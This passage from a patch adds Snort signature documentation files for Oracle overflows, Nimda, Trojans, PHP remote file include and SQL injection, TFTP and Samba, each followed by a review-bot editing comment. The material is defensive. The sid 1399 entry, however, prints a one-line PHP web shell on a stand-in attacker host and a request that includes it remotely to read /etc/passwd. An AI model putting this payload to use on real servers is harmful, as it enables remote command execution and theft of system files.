+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
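Review bot: same defects as the other dbms_repcat documents in this patch: the line break before ". This procedure is included in" splits a sentence ("...in the procedure comment_on_mview_repsites. This procedure is included in dbms_repcat."), "Oracle Oracle9i" repeats the vendor name, the Corrective Action line lacks a full stop, and Additional References is empty for a "known vulnerability" that has a vendor patch.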
--- /dev/null
+++ b/doc/signatures/2775.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2775
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
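Review bot: same defects as the other dbms_repcat documents in this patch: the line break before ". This procedure is included in" splits a sentence ("...in the procedure drop_priority_nvarchar2. This procedure is included in dbms_repcat."), "Oracle Oracle9i" repeats the vendor name, the Corrective Action line lacks a full stop, and Additional References is empty.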
--- /dev/null
+++ b/doc/signatures/1289.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1289
+
+--
+Summary:
+This event is generated when an exploited Internet Information Server (IIS) host attempts to perform a tftp download of the file admin.dll to infect the host with the nimda worm. 
+
+--
+Impact:
+Administrator access.  A successful attack can allow remote execution of commands with administrator privleges.
+
+--
+Detailed Information:
+The nimda worm uses multiple propagation methods.  One method exploits a victim Internet Information Server (IIS) using a unicode directory traversal attack to execute commands on the target server.  An attempt is made to execute a tftp download of the file admin.dll from the infected attacking host to the victim server.  The admin.dll file is a copy of the nimda worm that is activated on the newly infected victim server.  This event is triggered if the IIS server is exploitable and the tftp transfer is attempted.
+
+--
+Affected Systems:
+Hosts running Microsoft IIS 4.0 and 5.0.
+
+--
+Attack Scenarios:
+The worm will attempt to remotely exploit a unicode directory vulnerability to infect an IIS server by executing a tftp download of the nimda worm.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch referenced in Microsoft Security Bulletin MS00-078.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+
+Microsoft:
+http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp
+
+--
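Review bot: Corrective Action names only the MS00-078 patch, but this event fires on the tftp download of admin.dll after the host has already been exploited, so the advice should also cover containment for the specific event: treat a host that issued this request as infected and clean it per the CERT advisory cited below, and block TFTP (UDP port 69) across the perimeter so the worm cannot fetch its payload. The Summary says an "exploited" IIS host "attempts to perform a tftp download", while Detailed Information says the transfer is "from the infected attacking host to the victim server"; state which direction the rule matches. Typo in Impact: "privleges" should be "privileges".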
--- /dev/null
+++ b/doc/signatures/2657.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2657
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with Netscape Network Security Services (NSS) message parsing.
+
+--
+Impact:
+A successful attack can cause a heap overflow and the subsequent execution
+of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way NSS parses a client connect SSLv2 message
+that can cause a heap overflow and the subsequent execution of arbitrary code
+on a vulnerable server.  This can occur when an overly long challenge length
+and accompanying data are supplied in a Client Hello message.
+
+--
+Affected Systems:
+Netscape Enterprise Webserver all versions
+Netscape Personalization Engine all versions
+Nescape Directory Server all versions
+Netscape Certificate Management Server all versions
+Sun One/iPlanet all versions
+
+--
+Attack Scenarios:
+An attacker can send a Client Hello message with an overly long challenge
+length and data, causing a heap overflow on a vulnerable server.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
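Review bot: "False Negatives:None known." is on one line, missing the newline after the heading that every other section uses, so tooling that splits these files on "Heading:\n" will misread it. "Nescape Directory Server" under Affected Systems should be "Netscape". Ease of Attack says "Difficult." without saying why; one clause on what makes exploiting the heap overflow difficult would help triage. Additional References is empty although Corrective Action says "Upgrade to the latest non-affected version of the software"; cite the vendor advisory so the reader knows which version that is.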
--- /dev/null
+++ b/doc/signatures/397.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+397
+
+--
+
+Summary:
+This event is generated when An ICMP Host Precedence Violation is sent by the first hop router to a host to indicate that a requested precedence is not permitted for the particular combination of source and destination host, network destination, upper layer protocol, or source/destination port.
+
+--
+
+Impact:
+Routers will generate this message when the requested precedent is not permitted to transverse the network.  This could be an indication of an improperly configured routing device or a improperly configured host on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
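Review bot: wording errors in Impact: "requested precedent" should be "requested precedence" and "transverse the network" should be "traverse the network"; in the Summary "when An ICMP" has a stray capital; in Detailed Information "could indication routing problems" should be "could indicate". As with the sid 401 document, Impact describes the cause of the message rather than its impact (which Corrective Action says is none), and there is no Affected Systems section.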
--- /dev/null
+++ b/doc/signatures/1982.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1982
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
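Review bot: the "See also" line lists sid 1982, which is this document's own sid; drop it from the list. Under Corrective Action the key and value naming is mixed up: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ is the key, and "Systemtray" is a value added under that key, not a "Registry key added", so the two headings should read "Affected registry key" and "Value added under it". "Deepthroat sever" in Detailed Information should be "server". Ease of Attack describes detection and consequences rather than ease; a single line stating that the target must run the delivered installation program (as Attack Scenarios describes) would fit the heading.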
--- /dev/null
+++ b/doc/signatures/100000741.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000741
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "LogView.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "LogView.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
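Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host ...") and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials") are authentication-bypass boilerplate; neither describes a remote file include via the "$_CONF[path]" parameter, which is what the first paragraph says the rule matches on. Replace both with a description of an RFI attempt: the attacker passes a URL to a PHP file under their control in that parameter, and the server includes and executes it. Also "running ona web server" should be "on a web server", "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), and Additional References is empty.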
--- /dev/null
+++ b/doc/signatures/100000805.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000805
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "classified.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "classified.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
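Review bot: this file has the same template problems as the sid 100000741 document: the credential-checking boilerplate in Detailed Information and the "supply his/her own credentials" Attack Scenarios text do not describe a remote file include via the "insPath" parameter of "classified.php", "running ona web server" should be "on a web server", "may indicate that an exploitation attempt has been attempted" is redundant, and Additional References is empty. Fix the shared template once so all the remote file include documents get the corrected text.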
--- /dev/null
+++ b/doc/signatures/1444.txt
@@ -0,0 +1,82 @@
+Rule:
+
+--
+
+Sid:
+1444
+
+--
+
+Summary
+This event is generated when a TFTP GET request is made.  This is an 
+indication that someone is attempting to download a file on the server.
+
+--
+
+Impact
+A TFTP GET requests allows a remote attacker to download files on the 
+TFTP server.  If the TFTP server allows anonymous TFTP GET requests it 
+is possible to download any of the published files on the server..
+
+--
+
+Detailed Information
+This rule will generate an event on in-bound TFTP GET requests.  A TFTP 
+GET request is generated when an attempt to download a file from the 
+server is initiated.
+
+--
+
+Attack Scenarios
+Attackers may use TFTP to upload and download files from server that are
+properly or improperly configured.  Normally attackers attempt to locate
+TFTP servers using automated scanners and tools.  Once a TFTP server is 
+located an attempt to write files and get files from the TFTP server is 
+made.  Depending on the results of those tests attackers may attempt to 
+further exploit that system, by overwriting system files or downloading 
+password files to access the system.
+
+Cisco ONS platforms allow unauthenticated access to files via TFTP. This
+event may be generated when an attempt is made to access files on a 
+Cisco device using TFTP.
+
+--
+Ease of Attack
+Simple: Numerous tools and automated scripts exist for scanning large
+subnets for improperly configured TFTP servers.
+
+--
+False Positives
+Legitimate TFTP GET requests for polling routers or other network
+devices may trigger this rule.  
+
+--
+False Negatives
+None known
+
+--
+Corrective Action
+The TFTP server should be configured to only allow GET requests from
+trusted locations.
+
+--
+Contributors
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <Matt.Watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS148
+
+Bugtraq:
+http://www.securityfocus.com/bid/9699
+
+--
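Review bot: the section headings in this file ("Summary", "Impact", "Detailed Information", "Attack Scenarios", ...) lack the trailing colon that every other signature document in this patch uses, which will break any tooling that splits on "Heading:". Grammar: "A TFTP GET requests allows" should be "A TFTP GET request allows", "on the server.." has a doubled full stop, and "download files from server that are properly or improperly configured" should be "from servers that are". Corrective Action could carry the point Impact already makes: restrict GET requests by source address and do not publish files on the TFTP server that any anonymous client may not read.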
--- /dev/null
+++ b/doc/signatures/715.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+715
+
+--
+Summary:
+This event is generated when a telnet server sends an error message regarding a failed user attempt to issue the 'su' command to get root privileges. 
+
+--
+Impact:
+Failed root access.  This attack occurs when a user attempts to get root privileges using the su command.
+
+--
+Detailed Information:
+An attacker may attempt to gain root privileges by issuing the su command.  This implies that the attacker has successfully connected to the telnet server with an account other than root. A failed attempt will cause an error message to be generated indicating that the user is not a member of an authorized group to obtain root privileges.
+
+--
+Affected Systems:
+All telnet servers.
+
+--
+Attack Scenarios:
+At attacker may attempt to gain root privileges on a telnet server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+It is remotely possible that a legitimate user with multiple user accounts may attempt to issue su command from the wrong account.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use ssh instead of telnet to prevent su passwords from being sniffed.
+
+Tightly restric su access to authorized users.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
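Review bot: three typos in this file: "At attacker may attempt" should read "An attacker may attempt" (Attack Scenarios), "Tightly restric su access" should be "restrict", and the contributor line "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address. Additional References is also left empty.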
--- /dev/null
+++ b/doc/signatures/1752.txt
@@ -0,0 +1,71 @@
+Nigel removed w00.w00 reference and added CVE, bugtraq
+
+Rule:
+
+--
+Sid:
+1752
+
+--
+Summary:
+This event is generated when exploit traffic is observed that attempts to cause a buffer overflow in a Windows host running America Online (AOL) Instant Messenger (AIM).
+
+--
+Impact:
+Attempted user level access.  A successful attack may permit the execution of arbitrary code with the privileges of the user running AIM.
+
+--
+Detailed Information:
+AIM can be used for message and file exchanges as well as many other applications.  A buffer overflow exists in AIM code that requests external applications (AddExternalAPP) that may permit the execution of arbitrary code on a Windows client AIM host with the privileges of the user running AIM.  
+
+--
+
+Affected Systems:
+Windows hosts running AIM 4.2 - 4.8.2616.
+
+--
+Attack Scenarios:
+An attacker may craft a malformed AIM add external application request causing a buffer overflow, and potentially permitting the execution of arbitrary code with the privileges of the user running AIM. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This event is trigger when known exploit code is run.  It may be possible that other exploit code exists that will not trigger this event.
+
+--
+Corrective Action:
+
+ -Workstation:
+   Upgrade to version 2001B Beta v5.18 Build #3659 or later.
+
+    or
+
+   Go to Preferences in AIM -> Privacy ->
+   In "Who can contact me" check "Allow only users on my Buddy List".
+
+ -Network:
+   Block AIM traffic into and out of your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0362
+
+Bugtraq:
+http://www.securityfocus.com/bid/4677
+
+--
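Review bot: the first line of this file, "Nigel removed w00.w00 reference and added CVE, bugtraq", is an internal change note that sits above "Rule:" and would ship inside the documentation file; it should be dropped (or moved to the patch description). Also "This event is trigger when known exploit code is run" should read "triggered", and the version string in Corrective Action ("2001B Beta v5.18 Build #3659") follows a different scheme from the one used under Affected Systems ("AIM 4.2 - 4.8.2616"), which is worth double-checking so readers can tell whether their build is fixed.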
--- /dev/null
+++ b/doc/signatures/100000476.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000476
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "Action" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Action" parameter in the "meaning.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
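Review bot: the third paragraph of Detailed Information is the generic CGI credential-checking text also used in 1542.txt and does not describe an SQL injection in "meaning.php"; suggest dropping it and keeping the two VBZoom-specific paragraphs. Also "running ona web server" should be "on a web server", "may indicate that an exploitation attempt has been attempted" is redundant ("that an exploit has been attempted"), and the "--" separators after the Sid, Affected Systems and Contributors sections are missing the blank line that precedes them everywhere else in the patch.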
--- /dev/null
+++ b/doc/signatures/163.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+163
+
+--
+Summary:
+This event is generated when Trojan Horse activity is detected from the program WinCrash.
+
+--
+Impact:
+Limited control of the targeted machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the WinCrash server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP ports 5472 for version 1, and 2583 for version 2 to establish a connection between client and server.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named server.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	WinManager
+
+Removal of this entry is required.
+
+Delete the file server.exe
+
+Edit the win.ini file to remove any references to the Trojan file.
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS36
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/wincrash/index.html
+
+--
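Review bot: under Corrective Action, "Registry keys added are: WinManager" is misleading, since WinManager is a value added under the listed Run key rather than a key of its own; suggest "Registry value added under this key: WinManager". The sentence "The Trojan server is named server.exe" belongs in Detailed Information rather than Ease of Attack, where it is stranded after the advice about virus definitions.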
--- /dev/null
+++ b/doc/signatures/2485.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2485
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with Norton Internet Security 2004 AntiSpam feature.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the
+execution of arbitrary code in the context of LOCAL_SYSTEM.
+
+--
+Detailed Information:
+Norton Internet Security 2004 provides desktop security for Windows hosts.
+A buffer overflow exists in a module associated with the AntiSpam feature of 
+Norton Internet Security. This is an ActiveX module that has been labeled
+"safe for scripting" allowing it to be accessed and run via a client's
+web browser on a host running a vulnerable version of Norton Internet
+Security 2004. If an attacker can entice a user on a vulnerable host to
+a malicious web server, it is possible to invoke the faulty ActiveX
+component.  This may cause a buffer overflow and the execution of arbitrary
+code in the context of LOCAL_SYSTEM.
+
+--
+Affected Systems:
+Norton Internet Security 2004, Norton Internet Security Pro 2004 versions before 7.0.3.8
+
+--
+Attack Scenarios:
+An attacker can entice a user on a vulnerable host to a malicious web
+page and execute the faulty ActiveX component, possibly causing
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+-- Ease of Attack:
+Difficult unless exploit code becomes available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://security.focus.com/bid/9916
+
+--
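Review bot: the Bugtraq URL "http://security.focus.com/bid/9916" has the wrong host and will not resolve; compare the form used earlier in this patch, "http://www.securityfocus.com/bid/9699". Two formatting slips in the same file: "-- Ease of Attack:" puts the separator and the header on one line, breaking the "--" / header layout used everywhere else, and "Brian Caswell<bmc@sourcefire.com>" is missing the space before the address. "Additional References" also lacks its colon.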
--- /dev/null
+++ b/doc/signatures/1399.txt
@@ -0,0 +1,81 @@
+Rule: 
+
+--
+Sid:
+1399
+
+--
+Summary:
+This event is generated when an attempt is made to include a remote file
+as part of PHP-Nuke index.php.
+
+--
+Impact:
+Possible information disclosure, or command execution at the priviledge level of
+the user running the webserver.
+
+--
+Detailed Information:
+The index.php included with PHP-nuke allows inclusion of additional files.
+Normal usage might be situations where a webmaster wants to include
+additional code in their index.php.  This can be done via
+"index.php?file=<path_to_file>".  PHP-nuke also allows inclusion of
+files from remote sources specified by either ftp or http as the
+transport protocol.  This allows attackers to craft their own php file
+(say, foo.php) and store it remotely (say, http://mysite.org/foo.php)
+and then instruct the victim machine to include foo.php as part of it's
+source.  Any code in foo.php will get executed on the victim machine.
+
+
+--
+Affected Systems:
+	PHP Nuke 1.0 through 5.3.1
+ 
+--
+Attack Scenarios:
+In an attempt to gain access to a remote site that happens to use PHP-nuke,
+an attacker crafts the following foo.php, and places it on a website that
+he controls:
+	
+	<?php
+	system($cmd);
+	?> 
+
+The attacker can then include foo.php as part of a remote site's index.php
+that uses PHP-nuke, and execute any command:
+
+	lynx \
+	http://victim.com/index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd
+	
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+
+--
+False Negatives:
+If the page being accessed is not named index.php, but has the same
+vulnerability as the original index.php, the rule will not generate an
+event.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
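Review bot: the Attack Scenarios example does not work as written: foo.php calls system($cmd) without reading $cmd from the request, and the victim-side URL passes only a "file=" parameter (the "?cmd=" is part of that parameter's value, not a separate variable on the victim), so $cmd is never set. Either state that the example relies on PHP register_globals and a separate cmd parameter, or have foo.php read the command explicitly from the request. Also "priviledge level" should be "privilege level" and "as part of it's source" should be "its".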
--- /dev/null
+++ b/doc/signatures/2975.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2975
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
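Review bot: this file is word-for-word the same as 2466.txt later in this patch apart from the Sid, so nothing tells the reader what SID 2975 actually matches; Detailed Information should name the share, request or pattern the rule looks for. Also "adminsitrative shares" should read "administrative shares".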
--- /dev/null
+++ b/doc/signatures/1586.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1586
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
